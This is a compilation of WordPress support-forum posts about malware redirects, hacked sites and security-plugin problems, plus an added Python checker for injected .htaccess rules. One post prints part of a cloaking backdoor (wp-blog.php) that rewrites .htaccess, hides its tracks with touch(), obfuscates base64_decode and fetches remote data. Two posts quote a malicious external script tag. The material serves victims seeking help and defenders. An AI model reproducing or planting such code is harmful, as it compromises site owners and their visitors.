There is a malware redirect on my website, which redirects me even when trying to use the WordPress editor for editing the site and fixing the issue. I can log in and I can see the WordPress environment for a moment, but then I’m being redirected. I have read all the other help threads on malware redirects, but the problem is that I am not able to edit the site (update, backup, etc.) due to the redirect. Can anyone help?
Malware redirect: Unable to edit page
WordPress site redirected to another site
Hello, I need some help here. My WordPress site has been redirecting to another website since yesterday and I don’t know how to fix it. I tried to find the script in the project file and WordPress database but no luck at all.
Thank you for your help here.
Access Denied
Hi
I’ve inadvertently blocked access to one of our websites by activating a couple of settings in mini-orange 2FA. I was exploring the other options on the dashboard and I think because I tried setting protect wp_config file and htaccess (amongst others) I’ve damaged the setup.
I’ve tried disabling the plugin through the database, but I don’t have enough knowledge of the other wp_options which may also be causing the problem.
I can’t currently get to the WordPress login. Any help would be appreciated.
Regards
Julie
Guys, love your work… But take care of those updates
Hey guys,
I think it’s been now 5 or 6 times that a new update shows up in WordPress.
It doesn’t inspire much trust to see so many updates in a row.
Malware scan
Hello,
my host sent me a message and blocked the site:
The following file was blocked due to malware/attacks to protect the systems:
XXXX/wp-content/plugins/offen/templates/widget/style5.php
Having to reset permalinks due to 404 errors multiple times a day
Hey folks, hoping y’all might have some ideas on how to fix this. I had someone attack my website with a phished login back in December and post a phishing page. I deleted all the pages and malware by hand, and reset all passwords. No security issues since then. However, ever since then, my blog posts and pages have been breaking multiple times a day with the error
“Not Found
The requested URL /blog/ was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Resetting my permalinks fixes the problem, however it keeps occurring, sometimes multiple times a day. I’ve tried disabling all of my plugins and reverting my theme back to default 2019, that doesn’t work. I also tried resetting my .htaccess file, that also didn’t fix it.
My current .htaccess file is:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Use PHP70 as default
AddHandler application/x-httpd-php70 .php
<IfModule mod_suphp.c>
suPHP_ConfigPath /opt/php70/lib
</IfModule>
I’m currently running WordPress 5.3.2 with the Flatsome theme.
Help please! Pulling my hair out at this point!
Security Question: Why am I getting so much suspicious traffic?
Hello,
My Wordfence security plugin shows that there are IPs blocked from all over the world. I have GoDaddy, and multiple WordPress sites on one host. Some sites have multiple IP blocks per day, while others 1 every couple of days.
The IPs usually either go for /wp-login.php, or /xmlrpc.php. Wordfence lists them as Human, and sometimes bot.
Is all of this normal? Does everyone get bombarded by malicious traffic, or what is this?
If I transfer my WordPress sites to a new host, or to wordpress.com, would these “attacks” continue? Or is my hosting somehow compromised?
I don’t really know much about security, so any info would be of great help!
Thank you for reading.
Strange file
I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:
@ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
touch('.htaccess', $actime);
touch('wp-blog.php', $actime);
echo 'ok';
}
exit;
}
if (is_dir("wp-includes/Text/Diff/p")) {
$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";
$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
$redirect = 0;
$fof = '404 not found';
function getRealIpAddr() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];
if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";
if (ini_get('allow_url_fopen')) {
function get_data_ya($mmm) {
$data = file_get_contents($mmm);
return $data;
}
}
There’s more, but this part looks like it’s doing something suspicious.
I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.
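Added example, not part of the original post: a Python check that compares an .htaccess against the stock WordPress block quoted on this page and flags rewrites to any script other than index.php, such as the wp-blog.php rule in the snippet above. It compares content rather than file dates because the snippet resets modification times with touch(); the baseline block, the regex heuristic and the sample strings are assumptions constructed for illustration.

```python
import re

# Stock single-site WordPress block as quoted on this page (assumed baseline;
# subdirectory or multisite installs need their own).
STOCK = r"""<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>"""
STOCK_LINES = set(STOCK.splitlines())

# Constructed samples: a clean file, and the block the wp-blog.php snippet writes.
CLEAN = "# BEGIN WordPress\n" + STOCK + "\n# END WordPress\n"
INJECTED = CLEAN.replace(
    "RewriteBase /\n",
    "RewriteBase /\nRewriteRule ^(.+).html$ wp-blog.php?key=$1\n",
)

# Heuristic (an assumption of this example): a RewriteRule whose target is a PHP script.
PHP_TARGET = re.compile(r"^RewriteRule\s+\S+\s+/?(\S+?\.php)(?:[?\s]|$)", re.I)


def audit_htaccess(text):
    """Return (line_no, reason, line) for every suspicious line in an .htaccess."""
    findings, in_block = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line in ("# BEGIN WordPress", "# END WordPress"):
            in_block = line.startswith("# BEGIN")
            continue
        if not line:
            continue
        m = PHP_TARGET.match(line)
        if m and m.group(1).lower() != "index.php":
            findings.append((no, "rewrite to unexpected script " + m.group(1), line))
        elif in_block and line not in STOCK_LINES:
            findings.append((no, "non-stock line inside WordPress block", line))
    return findings


if __name__ == "__main__":
    for no, reason, line in audit_htaccess(INJECTED):
        print(f"line {no}: {reason}: {line}")
```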
One of a kind and safest life saver wordpress security
Million stars to the maker of this plugin. I recommend the whole world to use this plugin
Malware Found on Custom-admin-interface.php
Dear all
My provider has notified me that in the code below there’s malware.
/plugins/wp-custom-admin-interface/wp-custom-admin-interface.php
{HEX}Malware.Expert.generic.eval.base64.decode.41.UNOFFICIAL FOUND
Website hacked thanks to the poor code of this plugin
Website hacked thanks to the poor code of this plugin
Avoid this plugin at all costs if you don’t want your website to be hacked
Malware because of InfiniteWP Client
Hi,
The communication of the security issue arrived too late for me. No mail or whatsoever. One of my clients had to notify me. Quite awkward.
I have a couple of infected websites all on 1 server. Each time when I clean them up they get infected again within a couple of hours. Removing the malicious codes doesn’t seem to be enough. I’m missing some spots. But I have no idea where.
Why don’t you have any solution shared with us?! Can you give me a manual for how to clean up my websites/server?
Thanks!
Can’t update from 5.3.10
Hi,
I’m having issues trying to update this plugin from 5.3.10 to 5.3.13.
The Plugin page prompts me that this plugin has an update, although each time I click “update now” it proceeds as normal and starts to update although once I refresh the page, it prompts me to update again. I’ve tried it 4 times now.
Any ideas? The admin-ajax.php isn’t throwing any errors, although it keeps trying to update to 5.3.10 which is rather strange.
{"success":true,"data":{"update":"plugin","slug":"miniorange-2-factor-authentication","oldVersion":"Version 5.3.10","newVersion":"Version 5.3.10","plugin":"miniorange-2-factor-authentication\/miniorange_2_factor_settings.php","pluginName":"miniOrange 2 Factor Authentication"}}
chr() expects parameter 1 to be int, string given
chr() expects parameter 1 to be int, string given 1 +
wp-content/plugins/wp-security-pro/handler/login.php:62
Getting this PHP Notice when activating the plugin.
Infected With Malicious Redirect Malware
I’m helping my friend, with his new website.
As victims of daily bruteforce (before we had Cloudflare firewall rules), his WP credentials were breached. Our WordPress was up-to-date but our PHP was not at the time.
The bot created new ‘pages’ that cannot be seen in the WordPress dashboard.
I accidentally ran across it via Googling: site:hypelist.ca
**Check now and you will see it’s littered with Italian spam redirects from pages shown as 404 errors (according to https://sitecheck.sucuri.net/)
Disregard the ‘other’ malware (rogueads.unwanted.ads). They’re scripts from an ad network.
I’ve located some of the malware. In my root directory, I have a folder
called: postnew (last modified 1969-12-31 lol)
postnew contains:
1. idlogs.txt
2. index.php
3. moban.html
When I delete this file, it appears again after a few minutes.
.htaccess: Our .htaccess file appears compromised as well because of the Rewrite rules that are directed to postnew/index.php
Once again, when I delete the rewrite rules related to the above, it appears again.
I’ve even deleted the .htaccess file and create a new one via wordpress dashboard, no luck.
XML-RPC seems normal, but is it supposed to include: http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html near the top?
I’ve deleted a few plugins I thought could be an issue. Persists.
I’ve searched wp-includes, but would take forever to potentially find anything.
****When I deleted the postnew folder, My wp-admin page broke. Looks like this
When I use /wp-login.php it looks fine; upon successful login, it leads to the broken /wp-admin page.
I know some may suggest backup and reinstall WordPress. I’ve heard others online still had the issue after a clean install.
My friend attracted the malware, but I played around and broke the site even further.
Any help would be appreciated.
*note I do not have access to WordPress dashboard. Only cPanel, FTP & Cloudflare.
I will try to respond ASAP to move this along quickly.
Thanks in advance and for your time.
Malware found ioptimize.php
Hello Folks,
We have found a malicious plugin on several WordPress sites on several webhosts.
The plugin is called ioptimization, and would allow file uploads when opened directly (/wp-content/plugins/ioptimization/IOptimize.php). Luckily Wordfence is blocking this in our cases.
It does not seem to be because of another plugin, as websites with different plugins had this infection and on different servers, so I’m afraid this is a WordPress Core exploit.
This malicious plugin appeared 4 days ago (8 Feb), all around the same time.
So far, the damage has been minimal, but it’s more worrying this appeared in our sites in the first place.
I hope I posted this in the right place.
[malware code removed]
Hope this will be useful to someone
Malicious activity
Hello
I found this link 4 times in my home page source code: <script src="//mikkymax.com/20ba4519da0cfb915b.js" async="" type="text/javascript"></script>. I searched for it in my server code; it doesn’t exist there. When I did some research I found that it is malicious activity.
I used iThemes Security and Wordfence but no malware was detected.
Any help please?
Malicious activity not detected
Hello
I found this link 4 times in my home page source code: <script src="//mikkymax.com/20ba4519da0cfb915b.js" async="" type="text/javascript"></script>. I searched for it in my server code; it doesn’t exist there. When I did some research I found that it is malicious activity.
I used Wordfence but no malware was detected.
Any help please?
Unable to load/edit using Elementor
Hi. We’ve just installed the 14-day trial Security by CleanTalk plugin, and we can’t seem to be able to edit my pages using Elementor.
Furthermore, 3 of our Elementor-based pages have been flagged as “Frontend malware”: https://family.org.my/?page_id=2098, https://family.org.my/?page_id=4481, https://family.org.my/?page_id=7191.
As a result, we have disabled the plugin so we’re able to continue our work.
Appreciate your help to resolve this.